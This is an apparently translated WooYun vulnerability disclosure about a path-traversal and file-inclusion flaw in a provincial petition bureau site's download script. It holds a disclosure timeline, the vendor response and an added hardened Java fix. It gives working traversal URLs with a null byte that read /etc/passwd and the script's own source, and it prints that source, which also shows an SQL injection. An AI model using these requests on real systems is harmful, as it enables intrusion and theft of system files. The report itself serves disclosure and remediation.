
Vulnerability summary

Defect ID: wooyun-2015-091036

Title: File inclusion in a provincial petition bureau site exposes sensitive information

Vendor: CNCERT (National Internet Emergency Center)

Author: covertops

Submitted: 2015-01-13 11:35

Fixed: 2015-02-27 11:36

Published: 2015-02-27 11:36

Vulnerability type: file inclusion

Severity: high

Self-assessed Rank: 15

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-13: Details sent to the vendor, awaiting the vendor's handling
2015-01-16: Vendor confirmed; details disclosed to the vendor only
2015-01-26: Details disclosed to core white hats and domain experts
2015-02-05: Details disclosed to regular white hats
2015-02-15: Details disclosed to intern white hats
2015-02-27: Details disclosed to the public

Brief description:

Detailed description:

Shanxi Petition Bureau: http://www.xfsx.gov.cn
The vulnerable URL is:
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk,140117

[Screenshot: QQ20150110-1@2x.png]


[Screenshot: QQ20150110-3@2x.png]


But isn't everything after the %00 already truncated? Yet this request, without the trailing ",140117", fails:
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk (inclusion fails)

[Screenshot: QQ20150110-2@2x.png]


Fetching the script itself through the same hole:
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../mag/util/download.jsp%00.apk,140117
The contents of download.jsp are as follows:

<%@ page contentType="text/html; charset=gb2312"%>
<%@ page language="java" import="java.util.*,java.io.*"%>
<%@ page language="java" import="org.genius.data.ConfigParse" %>
<%@ page import="java.text.SimpleDateFormat" %>
<%@ page import="com.bwzy.coke.util.ParamsKeyUtil" %>
<%@ page import="org.springframework.context.ApplicationContext" %>
<%@ page import="org.springframework.context.support.ClassPathXmlApplicationContext" %>
<%@ page import="org.genius.data.IDataConfig" %>
<%@ page import="java.sql.SQLException" %>
<%@ page import="java.sql.ResultSet" %>
<%
// Record the request start time
Date startdate=new Date();
String nowTime = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(startdate);
// Record the URL the client requested
String requestURL=request.getLocalAddr() + ":" + request.getLocalPort() + request.getRequestURI() + "?" + request.getQueryString();
// Read the business type
String businesstype = request.getParameter(ParamsKeyUtil.URL_PARAMS_KEY_BUSINESSTYPE);
String type=request.getParameter(ParamsKeyUtil.URL_PARAMS_KEY_TYPE);
request.setCharacterEncoding("gb2312");
// "path" comes straight from the request in the form "<file name>,<six-digit folder key>"
String pathFolder = new String(request.getParameter("path")) ;
String[] fileName = pathFolder.split(",");
String PathHead = ConfigParse.getFilePath();
// fileName[1] is mandatory: a "path" value with no comma throws
// ArrayIndexOutOfBoundsException here and lands in the outer catch block
// ("download failed"), which is why the request without ",140117" fails
String folderL1 = fileName[1].substring(0,2);
String folderL2 = fileName[1].substring(2,4);
String folderL3 = fileName[1].substring(4,6);
// fileName[0] is appended to the configured base path with no traversal check;
// "../" sequences walk out of the upload directory
String realPath = PathHead + "/" + folderL1 + "/" + folderL2 + "/" + folderL3 + "/" + fileName[0];
String realPathFix = new String(realPath.getBytes("iso-8859-1"),"gbk");
File file = null;
try{
file = new File(realPathFix);
FileInputStream fis = new FileInputStream(file);
BufferedInputStream bis = new BufferedInputStream(fis);
OutputStream os = response.getOutputStream();
response.setContentType("application/octet-stream");
response.setHeader("Content-disposition", "attachment; filename="
+ new String(file.getName().getBytes("GBK"),"iso-8859-1"));
response.addHeader( "Content-Length","" + file.length());
ApplicationContext context = new ClassPathXmlApplicationContext(
"applicationContext.xml");
IDataConfig myData = (IDataConfig) context.getBean("dataConfigProxy");
myData.init();
ResultSet resultSet=null;
int downnum=0;
int id=0;
boolean result=false;
try {
myData.openConnection();
myData.beginTransaction();
// The raw "path" parameter is also concatenated into the SQL text unescaped
String sql1 ="select id,downnum from clientmanager where download='"+request.getParameter("path")+";'";
System.out.println(sql1);
resultSet=myData.executeQuery(sql1);
while (resultSet.next()){
downnum= Integer.parseInt(resultSet.getString("downnum"));
System.out.println("下载次数"+downnum);
id=resultSet.getInt("id");
}
if(downnum>=0){
downnum++;
String sql2 ="update clientmanager set downnum='" + downnum + "' where id='" + id + "'";
myData.addBatch(sql2);
if(myData.commit()){
result=true;
}else{
result=false;
}
}
System.out.println("是否插入成功"+result);
myData.endTransaction();
} catch (SQLException e) {
e.printStackTrace();
}finally{
myData.closeConnection();
}
byte[] buffer = new byte[1024];
try{
// Streams the file to the client (writes the whole buffer regardless of bytes read)
while(bis.read(buffer) != -1){
os.write(buffer);
}
}catch(Exception e){}
try{
os.flush();
}catch(Exception e){}
bis.close();
os=null;
try{
response.flushBuffer();
}catch(Exception e){}
out = pageContext.pushBody();
out.clear();
}catch(Exception e){
System.out.println("\""+realPathFix+"\" 文件下载失败");
response.getWriter().print("下载失败，未找到指定资源.");
}
%>


Proof of vulnerability:

With inclusion working, the petition bureau site should have plenty of places to upload attachments; I did not register an account.

Fix recommendation:

Validate the file name.
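A hardened version of the path resolution, added here as an illustration; it is not code from the reported site, its vendor, or WooYun, and `SafeDownloadPath`, `resolve` and the base directory in `main` are assumed names. It keeps the report's `<file name>,<six-digit folder key>` convention but rejects NUL bytes, path separators and parent references up front, then canonicalizes the result and confirms it still lies inside the configured base directory, so neither `../` sequences nor `%00` truncation can reach `/etc/passwd` or the script source.

```java
import java.io.File;
import java.io.IOException;
import java.util.regex.Pattern;

public class SafeDownloadPath {
    // A plain file name: letters, digits, Han characters, '.', '_' and '-' only.
    // No '/', '\\', NUL or other separators can pass this pattern.
    private static final Pattern SAFE_NAME =
            Pattern.compile("[\\p{Alnum}\\p{IsHan}._-]{1,128}");
    // The folder key must be exactly six digits, as in "140117".
    private static final Pattern FOLDER_KEY = Pattern.compile("\\d{6}");

    /**
     * Resolves "<fileName>,<folderKey>" to a File under baseDir/AA/BB/CC/fileName.
     * Throws IllegalArgumentException for anything that could escape baseDir.
     */
    public static File resolve(File baseDir, String pathParam) throws IOException {
        if (pathParam == null) {
            throw new IllegalArgumentException("missing path");
        }
        // Reject embedded NUL first: older JVMs truncated native file names at NUL,
        // which is what made "...passwd%00.apk" work against the original script.
        if (pathParam.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("NUL byte in path");
        }
        String[] parts = pathParam.split(",", -1);
        if (parts.length != 2) {
            throw new IllegalArgumentException("expected <name>,<key>");
        }
        String name = parts[0];
        String key = parts[1];
        if (!FOLDER_KEY.matcher(key).matches()) {
            throw new IllegalArgumentException("bad folder key");
        }
        if (!SAFE_NAME.matcher(name).matches() || name.equals(".") || name.equals("..")) {
            throw new IllegalArgumentException("bad file name");
        }
        File dir = new File(new File(new File(baseDir, key.substring(0, 2)),
                key.substring(2, 4)), key.substring(4, 6));
        File candidate = new File(dir, name);

        // Defence in depth: canonicalize both sides and check containment, which also
        // catches symlinks inside the upload tree pointing elsewhere.
        String base = baseDir.getCanonicalPath() + File.separator;
        String full = candidate.getCanonicalPath();
        if (!full.startsWith(base)) {
            throw new IllegalArgumentException("outside base directory");
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample inputs; the base directory is assumed, not the site's real one.
        File base = new File(System.getProperty("java.io.tmpdir"), "uploads");
        String[] samples = {
                "report.apk,140117",                      // accepted
                "../../../../etc/passwd,140117",          // rejected: separators
                "report.apk\u0000.apk,140117",            // rejected: NUL byte
                "report.apk",                             // rejected: no folder key
                "..,140117"                               // rejected: parent reference
        };
        for (String s : samples) {
            String shown = s.replace("\0", "\\0");
            try {
                System.out.println(shown + " -> " + resolve(base, s));
            } catch (IllegalArgumentException e) {
                System.out.println(shown + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

The allow-list on the name is the primary control; the canonical-path containment check is there so that a future relaxation of the pattern (or a symlink dropped into the upload tree) still cannot serve files from outside the configured directory. The same `path` value should also be bound as a prepared-statement parameter rather than concatenated into the download-counter query.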

Copyright notice: please credit covertops@WooYun when reposting.


Vendor response

Vendor response:

Severity: medium

Vulnerability Rank: 10

Confirmed: 2015-01-16 16:48

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been passed on through CNCERT to the Shanxi branch center, which will follow up and try to coordinate handling with the website's administrative unit.

Latest status:

None yet
